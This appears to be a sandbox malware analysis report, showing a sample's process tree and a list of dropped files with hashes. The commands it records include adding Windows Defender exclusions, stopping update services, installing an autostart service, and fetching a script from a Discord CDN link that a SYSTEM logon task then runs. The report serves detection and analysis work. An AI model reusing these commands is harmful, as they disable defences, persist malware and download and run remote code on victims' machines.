C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2684

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4884

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1464

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:5036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4732

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2824

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1280

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3640

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3176

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:64

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1076

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2252

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5028

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2804

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3560

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2056

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4196

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4120

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1740

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4880

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4204

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2516

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3104

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:428

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2996

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3536

C:\Users\Admin\AppData\Roaming\rtjirqmr.y331.exe
"C:\Users\Admin\AppData\Roaming\rtjirqmr.y331.exe"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4432

C:\Users\Admin\AppData\Roaming\rtjirqmr.y332.exe
"C:\Users\Admin\AppData\Roaming\rtjirqmr.y332.exe"
4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4936

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
5⤵
PID:5000

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
6⤵
PID:5016

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
5⤵
- Launches sc.exe
PID:4216

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:1040

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
5⤵
- Launches sc.exe
PID:4580

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
5⤵
- Launches sc.exe
PID:4264

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
5⤵
- Launches sc.exe
PID:3484

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
5⤵
PID:4444

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2892

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:4564

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
5⤵
PID:2880

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
5⤵
PID:1384

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4412

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "AAWUFTXN"
5⤵
- Launches sc.exe
PID:840

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"
5⤵
- Launches sc.exe
PID:5040

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:5116

C:\Users\Admin\AppData\Roaming\rtjirqmr.y333.exe
"C:\Users\Admin\AppData\Roaming\rtjirqmr.y333.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2580

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8F6F.tmp\8F70.tmp\8F71.bat C:\Users\Admin\AppData\Roaming\rtjirqmr.y333.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:3548

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:3364

C:\Windows\system32\where.exe
where node
6⤵
PID:2660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2672

C:\Windows\system32\msiexec.exe
msiexec /i nodejs-installer.msi /quiet
6⤵
PID:2392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js?ex=666da961&is=666c57e1&hm=18936ed8d9532b88193b485814d4fae2181305431d8e870870aab77fc153e162&' -OutFile 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'"
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:2672

C:\Windows\system32\schtasks.exe
schtasks /Create /SC ONLOGON /TN "RunNodeScriptAtLogon" /TR "node.exe 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'" /RU SYSTEM /F
6⤵
- Creates scheduled task(s)
PID:2880

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
2⤵
PID:2516

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3948

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3700

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4744

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3580

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3164

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:1848

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:360

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
PID:4692

C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
1⤵
PID:2236

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4736

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
1⤵
PID:2764

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3852

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:1568

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:4404

C:\Windows\System32\MsiExec.exe
C:\Windows\System32\MsiExec.exe -Embedding 387BBB040735E77D337E348F23FA644E
2⤵
- Loads dropped DLL
PID:2544

C:\Windows\System32\MsiExec.exe
C:\Windows\System32\MsiExec.exe -Embedding 1BFAA63A45B3EAF514CF79193D34867E E Global\MSI0000
2⤵
- Loads dropped DLL
- Modifies data under HKEY_USERS
PID:4500

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 724EBC75B41FFB54B5C35AC2C6663210
2⤵
- Loads dropped DLL
PID:492

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:2556

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3688

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:3584

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2836

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:2936

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:944

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e591e5f.rbs
Filesize
822KB

MD5
aa5f9da6fe86cbd2c8b41bfcc2283e8b

SHA1
fce35e6a9bd343d6eaadb5c4826ba499167ee8f9

SHA256
34eede5a9db7236b16b07651eb6ae2e81bf77f4f9259a89556fbe07b9f6c78df

SHA512
25e4712f50dfe08dd421abcb695621bbccaea869e504e63027950ead6de574a85d52f148f4975ddd5274a5b836026351a66490f55cff4a8cad307a516528d41d

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\tuf\LICENSE
Filesize
11KB

MD5
dfc1b916d4555a69859202f8bd8ad40c

SHA1
fc22b6ee39814d22e77fe6386c883a58ecac6465

SHA256
7b0ce3425a26fdba501cb13508af096ade77e4036dd2bd8849031ddecf64f7c9

SHA512
1fbe6bb1f60c8932e4dcb927fc8c8131b9c73afd824ecbabc2045e7af07b35a4155a0f8ad3103bf25f192b6d59282bfc927aead3cb7aaeb954e1b6dbd68369fa

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\verify\dist\shared.types.js
Filesize
79B

MD5
24563705cc4bb54fccd88e52bc96c711

SHA1
871fa42907b821246de04785a532297500372fc7

SHA256
ef1f170ad28f2d870a474d2f96ae353d770fff5f20e642cd8f9b6f1d7742df13

SHA512
2ce8d2cf580623358fef5f4f8925d0c9943a657c2503c80048ca789bf16eacdb980bfc8aaaa50101a738e939926fcf2545500484dcad782c700ee206d8c6f9b9

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSE
Filesize
754B

MD5
d2cf52aa43e18fdc87562d4c1303f46a

SHA1
58fb4a65fffb438630351e7cafd322579817e5e1

SHA256
45e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0

SHA512
54e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\chalk\license
Filesize
1KB

MD5
b862aeb7e1d01452e0f07403591e5a55

SHA1
b8765be74fea9525d978661759be8c11bab5e60e

SHA256
fcf1a18be2e25ba82acf2c59821b030d8ee764e4e201db6ef3c51900d385515f

SHA512
885369fe9b8cb0af1107ee92b52c6a353da7cf75bc86abb622e2b637c81e9c5ffe36b0ac74e11cfb66a7a126b606fe7a27e91f3f4338954c847ed2280af76a5f

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\env-paths\license
Filesize
1KB

MD5
5ad87d95c13094fa67f25442ff521efd

SHA1
01f1438a98e1b796e05a74131e6bb9d66c9e8542

SHA256
67292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec

SHA512
7187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\LICENSE.md
Filesize
818B

MD5
2916d8b51a5cc0a350d64389bc07aef6

SHA1
c9d5ac416c1dd7945651bee712dbed4d158d09e1

SHA256
733dcbf5b1c95dc765b76db969b998ce0cbb26f01be2e55e7bccd6c7af29cb04

SHA512
508c5d1842968c478e6b42b94e04e0b53a342dfaf52d55882fdcfe02c98186e9701983ab5e9726259fba8336282e20126c70d04fc57964027586a40e96c56b74

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\ignore-walk\LICENSE
Filesize
780B

MD5
b020de8f88eacc104c21d6e6cacc636d

SHA1
20b35e641e3a5ea25f012e13d69fab37e3d68d6b

SHA256
3f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706

SHA512
4220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmsearch\LICENSE
Filesize
730B

MD5
072ac9ab0c4667f8f876becedfe10ee0

SHA1
0227492dcdc7fb8de1d14f9d3421c333230cf8fe

SHA256
2ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013

SHA512
f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSE
Filesize
802B

MD5
d7c8fab641cd22d2cd30d2999cc77040

SHA1
d293601583b1454ad5415260e4378217d569538e

SHA256
04400db77d925de5b0264f6db5b44fe6f8b94f9419ad3473caaa8065c525c0be

SHA512
278ff929904be0c19ee5fb836f205e3e5b3e7cec3d26dd42bbf1e7e0ca891bf9c42d2b28fce3741ae92e4a924baf7490c7c6c59284127081015a82e2653e0764

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.js
Filesize
16KB

MD5
bc0c0eeede037aa152345ab1f9774e92

SHA1
56e0f71900f0ef8294e46757ec14c0c11ed31d4e

SHA256
7a395802fbe01bb3dc8d09586e0864f255874bf897378e546444fbaec29f54c5

SHA512
5f31251825554bf9ed99eda282fa1973fcec4a078796a10757f4fb5592f2783c4ebdd00bdf0d7ed30f82f54a7668446a372039e9d4589db52a75060ca82186b3

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\package.json
Filesize
1KB

MD5
d116a360376e31950428ed26eae9ffd4

SHA1
192b8e06fb4e1f97e5c5c7bf62a9bff7704c198b

SHA256
c3052bd85910be313e38ad355528d527b565e70ef15a784db3279649eee2ded5

SHA512
5221c7648f4299234a4637c47d3f1eb5e147014704913bc6fdad91b9b6a6ccc109bced63376b82b046bb5cad708464c76fb452365b76dbf53161914acf8fb11a

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\LICENSE
Filesize
763B

MD5
7428aa9f83c500c4a434f8848ee23851

SHA1
166b3e1c1b7d7cb7b070108876492529f546219f

SHA256
1fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7

SHA512
c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\dist\commonjs\package.json
Filesize
28B

MD5
56368b3e2b84dac2c9ed38b5c4329ec2

SHA1
f67c4acef5973c256c47998b20b5165ab7629ed4

SHA256
58b55392b5778941e1e96892a70edc12e2d7bb8541289b237fbddc9926ed51bd

SHA512
d662bff3885118e607079fcbeedb27368589bc0ee89f90b9281723fa08bda65e5a08d9640da188773193c0076ec0a5c92624673a6a961490be163e2553d6f482

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\dist\esm\package.json
Filesize
26B

MD5
2324363c71f28a5b7e946a38dc2d9293

SHA1
7eda542849fb3a4a7b4ba8a7745887adcade1673

SHA256
1bf0e53fc74b05f1aade7451fbac72f1944b067d4229d96bae7a225519a250e4

SHA512
7437cf8f337d2562a4046246fbfcc5e9949f475a1435e94efbc4b6a55880050077d72692cbc3413e0ccd8f36adf9956a6cc633a2adc85fbff6c4aa2b8edac677

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\emoji-regex\es2015\index.js
Filesize
17KB

MD5
cf8f16c1aa805000c832f879529c070c

SHA1
54cc4d6c9b462ad2de246e28cd80ed030504353d

SHA256
77f404d608e2a98f2a038a8aa91b83f0a6e3b4937e5de35a8dae0c23aa9ee573

SHA512
a786e51af862470ae46ad085d33281e45795c24897e64b2c4b265302fa9cbfa47b262ec188adbc80d51cfc6ba395b500c0d7f5d343ca4fc2b828eaedba4bd29a

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\emoji-regex\index.js
Filesize
15KB

MD5
9841536310d4e186a474dfa2acf558cd

SHA1
33fabbcc5e1adbe0528243eafd36e5d876aaecaa

SHA256
5b3c0ac6483d83e6c079f9ffd1c7a18e883a9aaeaedb2d65dd9d5f78153476b9

SHA512
b67680a81bb4b62f959ba66476723eb681614925f556689e4d7240af8216a49f0d994c31381bf6a9489151d14ed8e0d0d4d28b66f02f31188059c9b24aaa3783

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js documentation.url
Filesize
157B

MD5
3bb35f2c45df8ec90401854756af107b

SHA1
30a33337fc10312f7cdafbde910bb53444ad5726

SHA256
09e3d61e896dfa75c8a1044c8d8e306537fe09e44a37541303491f60f9603bb5

SHA512
07d99e901de248650f60491e0d4c8b7feca0fbd1815c0aa07f7118d6652ad8474af4c0b08434fd6dfe59e7e0ea0fe39812d27f40d4bf993f0c646238b7f5ea99

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js website.url
Filesize
133B

MD5
35b86e177ab52108bd9fed7425a9e34a

SHA1
76a1f47a10e3ab829f676838147875d75022c70c

SHA256
afaa6c6335bd3db79e46fb9d4d54d893cee9288e6bb4738294806a9751657319

SHA512
3c8047c94b789c8496af3c2502896cef2d348ee31618893b9b71244af667ec291dcb9b840f869eb984624660086db0c848d1846aa601893e6f9955e56da19f62

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D26.tmp.csv
Filesize
35KB

MD5
76b90715be91988281cedf8331d3c197

SHA1
0a5379973698909cb516c4133f152fa8f84a843e

SHA256
f679e390ae8ff32e403bc159afa34c28e4828c8778daf8e7e41eb04e46768b33

SHA512
8c9c8139d20cce4cf315ca951ca91362c2c7cf696efdc6aa389d9b288cf8640200b3b65bca9d141c8d95396f82ae83919981d0dcef5ccd0167cca108a42ede2e

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D46.tmp.txt
Filesize
12KB

MD5
a5eb23cd5ddc71da4befca710cbe1f88

SHA1
7ee7a4323fb5f501400811d0aa34e0048deb6944

SHA256
6b614a1e9d4a72b8ef25f17204da559d1a7eae99467b5e0f4d5f439a3b7ecd49

SHA512
90f98096c2928cff7c5f143c025eee8904d97a8c5d34f979ad02c3e6c5554457d378ccba5fd7661df06a5ec13178d43f12cc50bfcfe3fa7cce28b22617d2b4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
39707b7265bbe2adef00d9915f61b4e9

SHA1
63437ea875211141e8b69df04783a940c6940fa5

SHA256
646c544310171e543923f41907c7163da352bb06facf281b0edf05e24104a892

SHA512
133b47657499283baf270ceb56818e0d0a949f704105af9cb56518ea76e5fea8748d80cb0f1afc33f1bf4b12ec51601cd96b71978a7b35b88296e599f374d450

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
Filesize
14KB

MD5
db93273670958d52189e584a750f689d

SHA1
d2901b3dbbef68f28660667d213b5f30f37ad44f

SHA256
39df0d7e6c2f19f63a87ed6183466125bf30953e412306ea478ef8be992fc561

SHA512
1d742afd85bd0e34444880e315bd60e39a09ea31da602d83e7e261e3536428ef759ee18443c2f9022a21b53b6be357662ab0ef1a52dd924847a3c46f860ee267

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
Filesize
14KB

MD5
997eb9165d14a505a7f748d0d6a8a3e3

SHA1
6178ce3207b2102db7f89e16c64aec2807e58765

SHA256
027e2346b2aedc8cb51934f9362f2fcff21acb51dae311dd488ba75aa12c6f1d

SHA512
f3cb7b068c6726ca6fe1c370949e59bebef51811abcab6f03aa744d7c8c0ee21b35ac353c1eeb157580468ff7850be850c2d062945dadc6bd0444a67eca5614d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
Filesize
14KB

MD5
59e7f941b4da7f52333f4f6dc5ec4cbc

SHA1
9affb4496e24b7e7e9a2772eb97bfd7f6eae1490

SHA256
6e4788787cb9e144cfe0931b68dce956f411bd2e935c4329cdf8de2c0c9f55bb

SHA512
741fb19ceacda94953a543b29cffae767fd7ab02cecbadc9c0581ee04c9b845cf8db7f2bfe880bd7bdd2867cdd014eff24917c10ff7427a9394e04122682b599

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
Filesize
14KB

MD5
3a9310ff934e67e368d8a1b6106cda4f

SHA1
47e53e9b0dd364a96c97615b2d2a64982d988252

SHA256
3f1bdcd762c0252d4a0e71dcf7b3da989a2d570fc116515f6a36ac9fac9f5056

SHA512
be763422f8507eb0263741851d3dd3a2ef7f5b5c9a6efcd8d75a68b48c684d695b14bcfbe8a54eb75aa3d0836b4f6b93cfe17f6c73a99908748a96fd00b8616c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
Filesize
14KB

MD5
4438898718691a276b3b3d37896a376a

SHA1
96b96f459591fb889603cf75d4840cbd44061d30

SHA256
094c5bdc851d6047fdb3f4e4f477c31a3efe3c25d8f94cee44daf5ed28c68751

SHA512
5e54edeff90340b0edf6ff84dd4aaa7d5049fcccdf4e02b43c8875d2aa3dd1c1ccc508730c0bb2010b2dee3b586d4ca11cb7153d938267da00e6ea307dca2601

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
Filesize
14KB

MD5
04b2b2d2fd7c0e17d007e3555f42c5e1

SHA1
68481ef97ee26ec8fea2837217c86da6eb4cbaf6

SHA256
8829def18f2c9bcb861cc73cf5e212c11abcf498bf9d230c4d4d8324ac3bace3

SHA512
0afcf3c12cd5ef932fd93c3889d57740fedd7ea3e461428a31a736bea8878927c0ac1a9fdfd3204e212c762921114e42666c6ff66b87ab0f38c68c561e4d34e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PRICache\3060194815\1209253612.pri
Filesize
629KB

MD5
5cd3313eed51144ce9362142e68b875e

SHA1
2c6bc5c4674c024777bfa0a34a2a55358dba8b17

SHA256
8fc7c5faac253795ebc18b50d5b1d99139b95657454d43310c2b508dfe0e42bf

SHA512
6ab986b9b53aeaf0e8c9d2d5230aa74defff51b07534cdbcfe3c2322914517e84bb76e2f1e3f1dfdad674fc60ff54ffb8d5dd55a7deddeb0b6f16317f83219ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
bd88fd4872ef1622a4b39681b1e80390

SHA1
582411da6ecf446b34f2615179b0fd8fe6b0ef0b

SHA256
6a0136774e40e17636e04aa99032bba446eda2ba2092a5f36c22e0c5d0a6470d

SHA512
dfe5196ad0cca069261707a5832a220d8c65918aade646167322ecf43ecbdbc3127aa4a109e54a0a18b9b2379ea6b21798a1a3623ea34aee17f0ec63db331aa6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
c2028eede30671dfefa09079fa0c318f

SHA1
9dd64f5ad8678c85ecd41e5e7d7dd88e93edd020

SHA256
d21aba7f7c2058e51b4c456d69eab8ca7d962502ecd8e9f4b5f8a2e05d002f17

SHA512
13814cef8456bfd4851d9a6cf7a2d5e834eeaea626e7034560ce76d4b87be2b1ee3ed1bad1d05df96544ee2e29a6f3f9a996bbfff38eb70405a9b33cce008ef3

Download Submit
C:\Users\Admin\AppData\Local\Temp\8EA3.tmp\8EA4.tmp\8EA5.bat
Filesize
6KB

MD5
45f6bf2d3c1c47e445439b805929aae8

SHA1
9d2ba518dd058559bc1d690019bbed79c7cd5f85

SHA256
ca7484221dd9645e4608a8195965d941955cfb0f9a373d0870cfd244302ae0fa

SHA512
902eb3e38b0be7d795f17a779d0231d0d168fbb8d4ce32b48ba3774a6be9929016b213e9b0082b55e8ac4d2fadadce3184ba8c30f8a025003fec8c8b8e496c64

Download Submit
C:\Users\Admin\AppData\Local\Temp\8F6F.tmp\8F70.tmp\8F71.bat
Filesize
1KB

MD5
2b49f09f8e1785bf2e5c79d0f2bc7389

SHA1
05d68482ab1db17e11fef25fae270c3b784000ae

SHA256
706536e5077fcb4e5e4dd2f77d40f492e7ab6b12065cdc0b450fdd483f436279

SHA512
